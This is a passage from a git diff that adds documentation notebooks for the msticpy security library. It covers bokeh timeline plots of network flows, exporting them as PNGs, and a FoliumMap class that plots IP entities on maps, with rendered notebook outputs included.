[{\"docid\":\"dcc6ab61-c11a-490a-96f1-05d748f4aca5\",\"root_ids\":[\"5951\"],\"roots\":{\"5951\":\"c922d6c6-c56d-4381-be5a-3c2f890b6870\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "5951"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'5951', <span id=\"6199\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='5876', ...), Figure(id='5919', ...)],</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"6198\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"6199\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"6198\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Column(id='5951', ...)"
+      ]
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "az_net_flows_df.mp_timeline.plot_duration(\r\n",
+    "    group_by=[\"SrcIP\", \"DestIP\", \"L7Protocol\"]\r\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Exporting Plots as PNGs\n",
+    "To use bokeh.io image export functions you need selenium, phantomjs and pillow installed:\n",
+    "\n",
+    "`conda install -c bokeh selenium phantomjs pillow`\n",
+    "\n",
+    "or\n",
+    "\n",
+    "`pip install selenium pillow`\n",
+    "`npm install -g phantomjs-prebuilt`\n",
+    "\n",
+    "For phantomjs see https://phantomjs.org/download.html.\n",
+    "\n",
+    "Once the prerequisites are installed you can create a plot and save the return value to a variable. \n",
+    "Then export the plot using `export_png` function."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-14T00:02:23.361597Z",
+     "start_time": "2019-09-14T00:02:23.355600Z"
+    }
+   },
+   "source": [
+    "```python\n",
+    "from bokeh.io import export_png\n",
+    "from IPython.display import Image\n",
+    "\n",
+    "# Create a plot\n",
+    "flow_plot = nbdisplay.display_timeline_values(data=az_net_flows_df,\n",
+    "                                              group_by=\"L7Protocol\",\n",
+    "                                              source_columns=[\"FlowType\", \n",
+    "                                                              \"AllExtIPs\", \n",
+    "                                                              \"L7Protocol\", \n",
+    "                                                              \"FlowDirection\", \n",
+    "                                                              \"TotalAllowedFlows\"],\n",
+    "                                              time_column=\"FlowStartTime\",\n",
+    "                                              y=\"TotalAllowedFlows\",\n",
+    "                                              legend=\"right\", \n",
+    "                                              height=500,\n",
+    "                                              kind=[\"vbar\", \"circle\"]\n",
+    "                                            );\n",
+    "\n",
+    "# Export \n",
+    "file_name = \"plot.png\"\n",
+    "export_png(flow_plot, filename=file_name)\n",
+    "\n",
+    "# Read it and show it\n",
+    "display(Markdown(f\"## Here is our saved plot: {file_name}\"))\n",
+    "Image(filename=file_name)\n",
+    "```"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "interpreter": {
+   "hash": "b736adfe05d9ae282eea4c01a733d58a0215ef3399d39339e6557e4c515b0f48"
+  },
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.10"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "06408c1d26364c62bdef336cfec1716d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "0dcf54e606e447f1a462e63dd4f23d2c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "1b1e59ba52c44f6b9ec3c405f1da5ed2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_386a4307520e405aaee15c6cd1edfc06",
+       "style": "IPY_MODEL_06408c1d26364c62bdef336cfec1716d"
+      }
+     },
+     "34e9742e64954d27b14150a4d980c6ad": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "386a4307520e405aaee15c6cd1edfc06": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "438313fbe5f14b908d6c010c2200ceef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "54a6e82f90754a82bfd1abab3ba5cf0d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "70f8295184f44e84837be49dc197024c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "74e4e00ea8984e1bbd94960547d47563": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "826ce822cc1d41bbb6255a4c6fba81d6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "8cb49661379e4bc391d22ea6996368d9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/FoliumMap.ipynb b/docs/notebooks/FoliumMap.ipynb
new file mode 100644
index 000000000..a6088a278
--- /dev/null
+++ b/docs/notebooks/FoliumMap.ipynb
@@ -0,0 +1,788 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - Folium Map Plotting\n",
+    "\n",
+    "## Introduction\n",
+    "This module contains a class that wraps the `folium` package to plot geo-location data.\n",
+    "\n",
+    "Read the [Folium documentation](https://python-visualization.github.io/folium/)\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#Introduction\" data-toc-modified-id=\"Introduction-1\">Introduction</a></span></li><li><span><a href=\"#FoliumMap-class\" data-toc-modified-id=\"FoliumMap-class-2\">FoliumMap class</a></span></li><li><span><a href=\"#Adding-IP-Entities-to-the-map\" data-toc-modified-id=\"Adding-IP-Entities-to-the-map-3\">Adding IP Entities to the map</a></span><ul class=\"toc-item\"><li><span><a href=\"#Plot-IPAddress-entities-with-location-data\" data-toc-modified-id=\"Plot-IPAddress-entities-with-location-data-3.1\">Plot IPAddress entities with location data</a></span></li><li><span><a href=\"#Use-different-colors-and-icons\" data-toc-modified-id=\"Use-different-colors-and-icons-3.2\">Use different colors and icons</a></span></li></ul></li><li><span><a href=\"#Custom-Icons\" data-toc-modified-id=\"Custom-Icons-4\">Custom Icons</a></span></li><li><span><a href=\"#Utility-Functions\" data-toc-modified-id=\"Utility-Functions-5\">Utility Functions</a></span></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.418156Z",
+     "start_time": "2020-02-08T01:01:39.342857Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "\n",
+    "from IPython.display import display\n",
+    "import pandas as pd\n",
+    "\n",
+    "import msticpy.sectools as sectools\n",
+    "from msticpy.nbtools import *\n",
+    "from msticpy.nbtools.entityschema import IpAddress, GeoLocation\n",
+    "from msticpy.nbtools.foliummap import FoliumMap"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## FoliumMap class\n",
+    "\n",
+    "```\n",
+    "FoliumMap(\n",
+    "    title: str = 'layer1',\n",
+    "    zoom_start: float = 2.5,\n",
+    "    tiles=None,\n",
+    "    width: str = '100%',\n",
+    "    height: str = '100%',\n",
+    "    location: list = None,\n",
+    ")\n",
+    "Wrapper class for Folium/Leaflet mapping.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "title : str, optional\n",
+    "    Name of the layer (the default is 'layer1')\n",
+    "zoom_start : int, optional\n",
+    "    The zoom level of the map (the default is 7)\n",
+    "tiles : [type], optional\n",
+    "    Custom set of tiles or tile URL (the default is None)\n",
+    "width : str, optional\n",
+    "    Map display width (the default is '100%')\n",
+    "height : str, optional\n",
+    "    Map display height (the default is '100%')\n",
+    "location : list, optional\n",
+    "    Location to center map on\n",
+    "\n",
+    "Attributes\n",
+    "----------\n",
+    "folium_map : folium.Map\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.435147Z",
+     "start_time": "2020-02-08T01:01:41.419155Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" data-html=PCFET0NUWVBFIGh0bWw+CjxoZWFkPiAgICAKICAgIDxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgCiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgTF9OT19UT1VDSCA9IGZhbHNlOwogICAgICAgICAgICBMX0RJU0FCTEVfM0QgPSBmYWxzZTsKICAgICAgICA8L3NjcmlwdD4KICAgIAogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjQubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9MZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy8yLjAuMi9sZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzMuMi4wL2Nzcy9ib290c3RyYXAubWluLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9jc3MvYm9vdHN0cmFwLXRoZW1lLm1pbi5jc3MiLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL0xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLzIuMC4yL2xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3Jhd2Nkbi5naXRoYWNrLmNvbS9weXRob24tdmlzdWFsaXphdGlvbi9mb2xpdW0vbWFzdGVyL2ZvbGl1bS90ZW1wbGF0ZXMvbGVhZmxldC5hd2Vzb21lLnJvdGF0ZS5jc3MiLz4KICAgIDxzdHlsZT5odG1sLCBib2R5IHt3aWR0aDogMTAwJTtoZWlnaHQ6IDEwMCU7bWFyZ2luOiAwO3BhZGRpbmc6IDA7fTwvc3R5bGU+CiAgICA8c3R5bGU+I21hcCB7cG9zaXRpb246YWJzb2x1dGU7dG9wOjA7Ym90dG9tOjA7cmlnaHQ6MDtsZWZ0OjA7fTwvc3R5bGU+CiAgICAKICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwKICAgICAgICAgICAgICAgIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1ubyIgLz4KICAgICAgICAgICAgPHN0eWxlPgogICAgICAgICAgICAgICAgI21hcF84ODQ5ZGRkNjNiY2M0ZDMyOGQ0N2IxNmFlNGY1MTNjMSB7CiAgICAgICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICAgICAgICAgIHdpZHRoOiA1MC4wJTsKICAgICAgICAgICAgICAgICAgICBoZWlnaHQ6IDUwLjAlOwogICAgICAgICAgICAgICAgICAgIGxlZnQ6IDAuMCU7CiAgICAgICAgICAgICAgICAgICAgdG9wOiAwLjAlOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICA8L3N0eWxlPgogICAgICAgIAo8L2hlYWQ+Cjxib2R5PiAgICAKICAgIAogICAgICAgICAgICA8ZGl2IGNsYXNzPSJmb2xpdW0tbWFwIiBpZD0ibWFwXzg4NDlkZGQ2M2JjYzRkMzI4ZDQ3YjE2YWU0ZjUxM2MxIiA+PC9kaXY+CiAgICAgICAgCjwvYm9keT4KPHNjcmlwdD4gICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcF84ODQ5ZGRkNjNiY2M0ZDMyOGQ0N2IxNmFlNGY1MTNjMSA9IEwubWFwKAogICAgICAgICAgICAgICAgIm1hcF84ODQ5ZGRkNjNiY2M0ZDMyOGQ0N2IxNmFlNGY1MTNjMSIsCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgY2VudGVyOiBbNDcuNTk4MjMyOCwgLTEyMi4zMzFdLAogICAgICAgICAgICAgICAgICAgIGNyczogTC5DUlMuRVBTRzM4NTcsCiAgICAgICAgICAgICAgICAgICAgem9vbTogMTQsCiAgICAgICAgICAgICAgICAgICAgem9vbUNvbnRyb2w6IHRydWUsCiAgICAgICAgICAgICAgICAgICAgcHJlZmVyQ2FudmFzOiBmYWxzZSwKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgKTsKCiAgICAgICAgICAgIAoKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgdGlsZV9sYXllcl84MjAxZjJjNzIxYTE0NjNiYmNhZTVlZjFkM2VkY2ZkYiA9IEwudGlsZUxheWVyKAogICAgICAgICAgICAgICAgImh0dHBzOi8ve3N9LnRpbGUub3BlbnN0cmVldG1hcC5vcmcve3p9L3t4fS97eX0ucG5nIiwKICAgICAgICAgICAgICAgIHsiYXR0cmlidXRpb24iOiAiRGF0YSBieSBcdTAwMjZjb3B5OyBcdTAwM2NhIGhyZWY9XCJodHRwOi8vb3BlbnN0cmVldG1hcC5vcmdcIlx1MDAzZU9wZW5TdHJlZXRNYXBcdTAwM2MvYVx1MDAzZSwgdW5kZXIgXHUwMDNjYSBocmVmPVwiaHR0cDovL3d3dy5vcGVuc3RyZWV0bWFwLm9yZy9jb3B5cmlnaHRcIlx1MDAzZU9EYkxcdTAwM2MvYVx1MDAzZS4iLCAiZGV0ZWN0UmV0aW5hIjogZmFsc2UsICJtYXhOYXRpdmVab29tIjogMTgsICJtYXhab29tIjogMTgsICJtaW5ab29tIjogMCwgIm5vV3JhcCI6IGZhbHNlLCAib3BhY2l0eSI6IDEsICJzdWJkb21haW5zIjogImFiYyIsICJ0bXMiOiBmYWxzZX0KICAgICAgICAgICAgKS5hZGRUbyhtYXBfODg0OWRkZDYzYmNjNGQzMjhkNDdiMTZhZTRmNTEzYzEpOwogICAgICAgIAo8L3NjcmlwdD4= onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x297cb886688>"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "folium_map = FoliumMap(width=\"50%\", height=\"50%\", location=(47.5982328,-122.331), zoom_start=14)\n",
+    "folium_map"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The underlying folium map object is accessible as the `folium_map` attribute"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.441144Z",
+     "start_time": "2020-02-08T01:01:41.436631Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "folium.folium.Map"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "type(folium_map.folium_map)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding IP Entities to the map\n",
+    "\n",
+    "```\n",
+    "fol_map.add_ip_cluster(\n",
+    "    ip_entities: Iterable[msticpy.nbtools.entityschema.IpAddress],\n",
+    "    **kwargs,\n",
+    ")\n",
+    "\n",
+    "Add a collection of IP Entities to the map.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "ip_entities : Iterable[IpAddress]\n",
+    "    a iterable of IpAddress Entities\n",
+    "\n",
+    "Other Parameters\n",
+    "----------------\n",
+    "    kwargs: icon properties to use for displaying this cluster\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.464131Z",
+     "start_time": "2020-02-08T01:01:41.442143Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" data-html=PCFET0NUWVBFIGh0bWw+CjxoZWFkPiAgICAKICAgIDxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgCiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgTF9OT19UT1VDSCA9IGZhbHNlOwogICAgICAgICAgICBMX0RJU0FCTEVfM0QgPSBmYWxzZTsKICAgICAgICA8L3NjcmlwdD4KICAgIAogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjQubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9MZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy8yLjAuMi9sZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzMuMi4wL2Nzcy9ib290c3RyYXAubWluLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9jc3MvYm9vdHN0cmFwLXRoZW1lLm1pbi5jc3MiLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL0xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLzIuMC4yL2xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3Jhd2Nkbi5naXRoYWNrLmNvbS9weXRob24tdmlzdWFsaXphdGlvbi9mb2xpdW0vbWFzdGVyL2ZvbGl1bS90ZW1wbGF0ZXMvbGVhZmxldC5hd2Vzb21lLnJvdGF0ZS5jc3MiLz4KICAgIDxzdHlsZT5odG1sLCBib2R5IHt3aWR0aDogMTAw